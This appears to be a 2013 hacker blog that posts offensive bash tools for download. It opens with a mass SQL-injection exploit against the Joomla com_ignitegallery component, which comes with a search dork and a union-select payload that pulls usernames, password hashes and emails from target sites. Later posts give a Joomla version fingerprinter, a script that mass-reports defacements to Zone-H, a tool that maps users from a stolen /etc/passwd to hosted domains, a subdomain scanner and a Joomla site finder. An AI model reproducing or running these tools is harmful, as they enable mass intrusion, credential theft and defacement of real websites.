#!/bin/bash #Joomla (com_ignitegallery) Remote Exploit #Dork: inurl:"option=com_ignitegallery" #Coded By Red V!per # D3m00 : http://www.mediafire.com/download/dxeob7as8bgozwo/Joomla-com_ignitegallery-remoot-exploit.mp4 #Tnx 2 : All Turkish && Persian Hackers B="\033[1m" N="\033[0m" L="\033[5m" C="\033[m" if [[ $# != 1 ]]; then clear echo echo -e "$B Joomla (com_ignitegallery) Remote Exploit - 240\n" echo -e " -=============================================-\n" echo -e " Joomla Ignite Gallery 0.8.3.1 SQL Injection \n" echo echo -e " By Red Hat V!per\n" echo -e " -=============================================-\n" echo -e " example: ./JCI-RE.sh targets.lst \n" echo -e "\n Run:$B ./JCI-RE.shDownload Script : http://www.mediafire.com/view/c2kwa9cpm1m030d/joomla-remote-exploit.sh$N\n" exit 1 fi VICTIMS=$1 clear echo echo -e "$B Joomla (com_ignitegallery) Remote Exploit [public] - 240\n" echo -e " -===============================================-\n" echo -e " Joomla Ignite Gallery 0.8.3.1 SQL Injection " echo echo -e " BY : Red V!per\n" echo -e " -===============================================-" echo echo echo -e " -========== [ INFO ] ===========-" echo echo -e " [+] Checking :$B $VICTIMS" echo Exploit="%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activation%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9 088e8" pars_respone() { keyword=`cat page.php | grep "[a-zA-Z0-9]:[0-9]"` username=`echo "$keyword" | grep "" | cut -d ':' -f 1 |sed -e 's/^[ \t]*//' | awk '{gsub(" ","")}1'` pass_1=`echo "$keyword" | grep "
" | cut -d ':' -f 2` pass_2=`echo "$keyword" | grep "" | cut -d ':' -f 3` password="$pass_1:$pass_2" email=`echo "$keyword" | grep "" | cut -d ':' -f 4` echo -e "[~] $B Host : $url_1=$url_2"; echo -e "[~] $B Username : $username"; echo -e "[~] $B Password : $password"; echo -e "[~] $B Email : $email"; echo -e "" } pars_url() { rm -rf page.php* url_1=`echo "$1" | cut -d '=' -f 1,2,3` url_2=`echo "$1" | cut -d '=' -f 4` url=""$url_1"=-"$url_2""$Exploit"" wget -q -O page.php "$url" pars_respone; } for trg in `cat $VICTIMS` do pars_url $trg done
Tuesday, August 20, 2013
Joomla (com_ignitegallery) Remote Exploit
D3m00 : http://www.mediafire.com/download/dxeob7as8bgozwo/Joomla-com_ignitegallery-remoot-exploit.mp4
Thursday, August 15, 2013
Red V!per Joomla Version Checker
#!/bin/bash
# Red V!per Joomla Version Checker
# Coded By Red H4t V!per
# Tnx 2 : Pawel Frankowski
url="$1"
Usage()
{
echo ""
echo "# ****************************************************************************************************#"
echo "# Usage : Red V!per Joomla Version Checker <target> *#"
echo "# Help : -h && --help : Show This Menu *#"
echo "# RunScript : Give Permision to script and run it !! *#"
echo "# Example : ./script.sh www.example.com/joomla/ *#"
echo "# ****************************************************************************************************#"
echo ""
exit
}
Check_Arguments()
{
if [ -z "$url" ] || [ "$url" == "-h" ] || [ "$url" == "--help" ]; then
Usage;
exit
fi
}
Check_Joomla_Version()
{
clear
i=0
echo -e '\E[32m'"[*] Start Check ..."; tput sgr0
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
wget -q "$url/templates/system/css/system.css"
Version=`cat system.css | grep "OpenID icon style"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
version=`cat system.css | grep "2011-01-09 02:40:25Z ian"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
version=`cat system.css | grep "2011-05-11 01:10:29Z dextercowley"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.7 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
version=`cat system.css | grep "2012 Open Source Matters"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
wget -q "$url/media/system/js/mootools-more.js"
Version=`cat mootools-more.js | grep "MooTools={version:"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
Version=`cat mootools-more.js | grep "1.3.0.1"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
Version=`cat mootools-more.js | grep "1.3.2.1"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.7 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
Version=`cat mootools-more.js | grep "1.4.0.1"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5.6 or 3.0 alpha 2 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
wget -q "$url/language/en-GB/en-GB.ini"
Version=`cat en-GB.ini | grep "11391 2009-01-04 13:35:50Z ian"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.5.26 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
Version=`cat en-GB.ini | grep "20196 2011-01-09 02:40:25Z ian"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6.0 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
Version=`cat en-GB.ini | grep "2011-03-18 16:42:30Z infograf768"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.6.5 or 1.7.1 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
Version=`cat en-GB.ini | grep "22183 2011-09-30 09:04:32Z infograf768"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 1.7.3 or 1.7.5 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
Version=`cat en-GB.ini | grep "<version>2.5.0"`
if [ -z "$Version" ]; then
let i=$i+1
echo -e '\E[32m'"[*] Testing method ($i) ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5.0 -> 2.5.4 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
Version=`cat en-GB.ini | grep "<version>2.5.5"`
if [ -z "$Version" ]; then
echo -e '\E[32m'"[*] Shit :( Not Found ..."; tput sgr0
sleep 0.5
else
echo -e '\E[32m'"[*] Found : $url (joomla) Version is 2.5.5 or 2.5.6 "; tput sgr0
echo -e '\E[32m'"[*] Finish ..."; tput sgr0
exit
fi
}
pre_remove()
{
rm -rf system.css*
rm -rf mootools-more.js*
rm -rf en-GB.ini*
}
main()
{
pre_remove;
Check_Arguments;
Check_Joomla_Version;
}
main;
Download :http://www.mediafire.com/download/qcu94wd73p72z78/RedViper-Joomla-Version-Chcker.sh
Tuesday, July 23, 2013
TBH Zone-H Mass Poster
#!/bin/bash
# TBH Zone-H Mass Poster
#c0ded by Red V!per
notifier=$1
sites=$2
url="http://www.zone-h.org/notify/single"
banner()
{
echo " "
echo -e '\E[32m'"_________ ______ "; tput sgr0
echo -e '\E[32m'"\__ __/( ___ \ |\ /| "; tput sgr0
echo -e '\E[32m'" ) ( | ( ) )| ) ( | "; tput sgr0
echo -e '\E[32m'" | | | (__/ / | (___) | "; tput sgr0
echo -e '\E[32m'" | | | __ ( | ___ | "; tput sgr0
echo -e '\E[32m'" | | | ( \ \ | ( ) | "; tput sgr0
echo -e '\E[32m'" | | | )___) )| ) ( | "; tput sgr0
echo -e '\E[32m'" )_( |/ \___/ |/ \| "; tput sgr0
echo " "
}
Usage()
{
echo ""
echo "# ****************************************************************************************************#"
echo "# Usage : TBH Zone-H Mass Poster <defacer> <sites.lst> *#"
echo "# Help : -h && --help : Show This Menu *#"
echo "# RunScript : Give Permision to script and run it !! *#"
echo "# Example : ./script.sh www.example.com ye_bande_khoda sites.lst *#"
echo "# ****************************************************************************************************#"
echo ""
exit
}
Check_Arguments()
{
if [ -z "$notifier" ] || [ "$notifier" == "-h" ] || [ "$notifier" == "--help" ]; then
Usage;
exit
fi
}
Mass_Post()
{
for targets in `cat $sites`
do
curl --user-agent "Mozilla/5.0" --silent --data "defacer=$notifier&domain1=$targets&hackmode=1&reason=1" ${url} &
sleep 2
done
}
Main()
{
banner;
Check_Arguments;
Mass_Post;
}
Main;
Dowloadn : http://www.mediafire.com/download/j10du919tq25f2d/TBH+Zone-H+Mass+Poster.zip
Saturday, July 20, 2013
Web Exploiter Toolkit
This script makes it easy tasks such as client hacking , web hacking , Wireless hacking ...
Now Working on it ...
https://github.com/RedH4tViper/webexploiter
Red V!per User Domain Extractor
create etc-passwd.txt file Besides User+Domain Extractor script and insert Contents of
/etc/passwd file Within etc-passwd.txt then Give Permision to script and run it
#!/bin/bash
#
# ---------------------------------
# User+Domain Extractor
# Licence : Linux
# ---------------------------------
#
# Title : User+Domain Extractor
# Code : Bash
# Author : RedH4t.Viper
# Email : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com
# Date : 2013 06 May
# Home : IrIsT Security Center
# Thanks : IrIsT ,TBH ,kurdhackteam , 3xp1r3
#
# Gr33tz : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf |
# Gr33tz : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |
# Gr33tz : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |
# Gr33tz : x3o-1337 | rEd X | No PM | Gabby | Sukhoi Su-37
# Gr33tz : ARTA | H-SK33PY | (^_^) | Turk Sever | And All Of IrIsT Memebrz
#------------------------------------------------------------------------------------------#
IP=
F_ARG=$1
page=0
last_page_check=
how_many=1
single_page=
Usage()
{
echo ""
echo "# ****************************************************************************************************#"
echo "# Usage : User+Domain Extractor <ip> *#"
echo "# Help : -h && --help : Show This Menu *#"
echo "# RunScript : create etc-passwd.txt file Besides User+Domain Extractor script and insert Contents *#"
echo "# RunScript : of /etc/passwd file Within etc-passwd.txt then Give Permision to script and run it !! *#"
echo "# ****************************************************************************************************#"
echo ""
}
get_reverse()
{
# check IP
if [ `echo "$F_ARG" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then
IP="$F_ARG"
else
IP=`resolveip -s "$F_ARG"`
if [ "$?" != 0 ]; then
echo -e " [-] Error: cannot resolve $F_ARG to an IP "
exit
fi
fi
url_neighbors="http://www.my-ip-neighbors.com/?domain=$IP"
wget -q -O my-ip-neighbors.php "$url_neighbors"
cat my-ip-neighbors.php | egrep -o '<a -d="" -f4="" cut="" href="http://whois.domaintools.com/%5B%5E" sort="" uniq="">> whois_neighbors.txt
url_kenh12="http://ip.kenh12.com/Reverse-IP-Lookup-DNS-Domain/$IP.html"
wget -q -O my-ip-kenh12.php "$url_kenh12"
cat my-ip-kenh12.php | egrep -o "gif' alt=[^>]+" | cut -d '=' -f2 | sed '/www./s///g' | sort | uniq >> whois_kenh12.txt
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
url="http://www.bing.com/search?q=ip%3A$IP&go=&qs=n&first=${page}0&FORM=PERE"
wget -q -O bing.php "$url"
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' bing.php`
# if no results are found, how_many is empty and the loop will exit
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' bing.php |cut -d '>' -f 2|cut -d ' ' -f 1-3`
# check for a single page of results
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' bing.php`
cat "bing.php"| egrep -o "</span></span></span></a>
<h3>
<span class="sb_count" id="count"><span class="sb_count" id="count"><span class="sb_count" id="count"><a -d="" -f="" 2="" bing.php="" cut="" href="http://www.blogger.com/%5C">> alldomain_bing.txt
let page=$page+1
rm -f bing.php
done
cat alldomain_bing.txt | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq >> whois_bing.txt
rm alldomain_bing.txt ;
for line_bing in `cat whois_bing.txt`
do
echo "$line_bing" >> reversed.txt
done
for line_neighbors in `cat whois_neighbors.txt`
do
echo "$line_neighbors" >> reversed.txt
done
for line_kenh12 in `cat whois_kenh12.txt`
do
echo "$line_kenh12" >> reversed.txt
done
rm whois_bing.txt;
rm whois_neighbors.txt;
rm whois_kenh12.txt;
rm my-ip-neighbors.php;
rm my-ip-kenh12.php;
}
get_user()
{
cat etc-passwd.txt | egrep "/home" | cut -d ':' -f 1 >>user.txt
}
get_user_with_site()
{
for reverse in `cat user.txt`
do
site=`cat reversed.txt | grep "$reverse"`
cat reversed.txt | grep "$reverse" >> /dev/null;check=$?
if [ $check -eq 0 ]
then
echo -e "[+] Found : User: "$reverse" \t Site: $site"
echo -e "[+] Found : User: "$reverse" \t Site: $site" >>ListUserDomain.txt
fi
done
rm -rf user.txt
rm -rf reversed.txt
}
main()
{
# check for arguments
if [ -z "$F_ARG" ] || [ "$F_ARG" == "-h" ] || [ "$F_ARG" == "--help" ]; then
Usage;
exit
fi
get_reverse;
get_user;
get_user_with_site;
}
main;
Download: http://www.mediafire.com/download/ismd5f47n7hs7my/User_Domain_Extractor.sh
Red V!per Sub Domain Scanner
#!/bin/bash # WebExploiter Sub Domain Scanner # Coded By : Red H4t V!per page=0 how_many=1 URL=$1 domain= single_page= last_page_check= banner() { echo " _ _ _ " echo " | | | | (_) " echo " ___ _ _| |__ __| | ___ _ __ ___ __ _ _ _ __ ___ ___ __ _ _ __ _ __ ___ _ __ " echo "/ __| | | | '_ \ / _\ |/ _ \| '_ \ _ \ / _\ | | '_ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| " echo "\__ \ |_| | |_) | (_| | (_) | | | | | | (_| | | | | | \__ \ (_| (_| | | | | | | | __/ | " echo "|___/\__,_|_.__/ \__,_|\___/|_| |_| |_|\__,_|_|_| |_| |___/\___\__,_|_| |_|_| |_|\___|_| " echo " " } Usage() { echo "" echo "# ****************************************************************************************************#" echo "# Usage : WebExploiter Sub Domain Scanner <domin> *#" echo "# Help : -h && --help : Show This Menu *#" echo "# RunScript : Give Permision to script and run it !! *#" echo "# ****************************************************************************************************#" echo "" } Check_Arguments() { if [ -z "$URL" ] || [ "$URL" == "-h" ] || [ "$URL" == "--help" ]; then Usage; exit fi } Sub_Domain() { rm -f alldomain_bing.txt; rm -f sub.txt; rm -f sub2.txt; if [ `echo "$URL" | egrep "http://"` ] || [ `echo "$URL" | egrep "Http://"` ]; then echo -e "\e[1;31m[-] please insert domain with out http:// \e[0m" exit 1 fi if [ `echo "$URL" | egrep "www."` ]; then domain=`echo "$URL" |sed '/www./s///g' ` else domain=$URL fi echo -e "\e[1;31m[*] SubDomain Urls Will be Saved at subdomain.txt Searching Plz W8...\e[0m" while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do url="http://www.bing.com/search?q=%27$domain%27&qs=n&pq=%27$domain%27&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE" wget -q -O sub_domain_bing.php "$url" last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' sub_domain_bing.php` how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' sub_domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3` single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' sub_domain_bing.php ` cat "sub_domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" sub_domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt rm -f sub_domain_bing.php let page=$page+1 done cat alldomain_bing.txt | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq >> sub.txt for var in `cat sub.txt` do echo "$var" | grep "$domain" >> /dev/null;check=$? if [ $check -eq 0 ] then echo "$var" >> sub2.txt fi done cat sub2.txt | sort | uniq > subdomain.txt found_N=`wc -l subdomain.txt | sed 's/subdomain.txt//'` echo -e "\e[1;34m[+] Found $found_N SubDomain :) \e[0m" for catvar in `cat subdomain.txt` do echo -e "\e[1;32m[*] $catvar \e[0m" done rm -f alldomain_bing.txt; rm -f sub.txt; rm -f sub2.txt; } main () { banner; Check_Arguments; Sub_Domain; } main ;Download : http://www.mediafire.com/download/638lw6ao7zjw7c4/red-viper-sub-dmoain-scannner.sh
Red V!per Server joomla Finder
#!/bin/bash # # --------------------------------- # Server joomla Finder # Licence : Linux # --------------------------------- # # Title : Server Joomla Finder # Code : Bash # Author : RedH4t.Viper # Email : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com # Released : 2013 04 June # Thanks : IrIsT ,TBH ,kurdhackteam , 3xp1r3 , thecrowscrew # # Gr33tz : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Skote_Vahshat | # Gr33tz : Net.W0lf | Dj.TiniVini| Mr.XHat | Black King | Devil | # Gr33tz : E2MAEN | (^_^) | M4st3r4N0nY |Turk Sever | dr.koderz | V30sharp # Gr33tz : ARTA | Mr.Zer0 | Sajjad13and11 | Silent | Smartprogrammer | # Gr33tz : x3o-1337 | rEd X | No PM | Gabby | Sukhoi Su-37 | IR Anonymous | # Gr33tz : Megatron | Zer0 | sole sad | Medrik | F@rid | And All Of IrIsT Memebrz | #------------------------------------------------------------------------------------------# page=0 how_many=1 IP_SERVER=$1 single_page= last_page_check= banner() { echo " _ _ __ _ _ " echo " (_) | | / _(_) | | " echo " _ ___ ___ _ __ ___ | | __ _ | |_ _ _ __ __| | ___ _ __ " echo " | |/ _ \ / _ \| '_ \ _ \| |/ _\ | | _| | \_ \ / _\ |/ _ \ __| " echo " | | (_) | (_) | | | | | | | (_| | | | | | | | | (_| | __/ | " echo " | |\___/ \___/|_| |_| |_|_|\__,_| |_| |_|_| |_|\__,_|\___|_| " echo " _/ | " echo " |__/ " echo " " } Usage() { echo "" echo "# ***************************************************************************??****?*********************#" echo "# Usage : Server Joomla Finder <IP/Domain> *#" echo "# Help : -h && --help : Show This Menu *#" echo "# RunScript : Give Permision to script and run it !! *#" echo "# ***************************************************************************??****?*********************#" echo "" } Check_Arguments() { if [ -z "$IP_SERVER" ] || [ "$IP_SERVER" == "-h" ] || [ "$IP_SERVER" == "--help" ]; then Usage; exit fi } Searching_Jce() { rm -rf domains.txt rm -rf alldomain_bing.txt rm -rf IndexDomain.txt if [ `echo "$IP_SERVER" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then IP="$IP_SERVER" else IP=`resolveip -s "$IP_SERVER"` if [ "$?" != 0 ]; then echo -e "[-] Error: cannot resolve $IP_SERVER to an IP " Check_Back fi fi echo -e "\e[1;35m[*] Finded Joomla Web Sites Will be Save at finded.txt \e[0m" echo -e "\e[1;35m[*] Searching Joomla Web Sites on $IP Plz W8 \e[0m" touch alldomain_bing.txt; while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE" wget -q -O domain_bing.php "$url" last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php` # if no results are found, how_many is empty and the loop will exit how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3` # check for a single page of results single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php ` cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt rm -f domain_bing.php let page=$page+1 done cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt for domain in `cat domains.txt` do echo "$domain" | grep "com_" >> /dev/null;check=$? if [ $check -eq 0 ] then echo "$domain" >>IndexDomain.txt fi done cat IndexDomain.txt | cut -d '?' -f 1 | awk '{gsub("index.php","")}1' | sort | uniq >> finded.txt found_N=`wc -l finded.txt | sed 's/finded.txt//'` echo -e "\e[1;34m[+] Found $found_N :) \e[0m" for joom in `cat finded.txt` do echo -e "\e[1;32m[*] $joom \e[0m" done rm -rf domains.txt rm -rf alldomain_bing.txt rm -rf IndexDomain.txt } main() { banner ; Check_Arguments; Searching_Jce; } main;
Download : http://www.mediafire.com/download/mtpy84d7lp0byol/red-viper-joomla-finder.sh
Subscribe to:
Posts (Atom)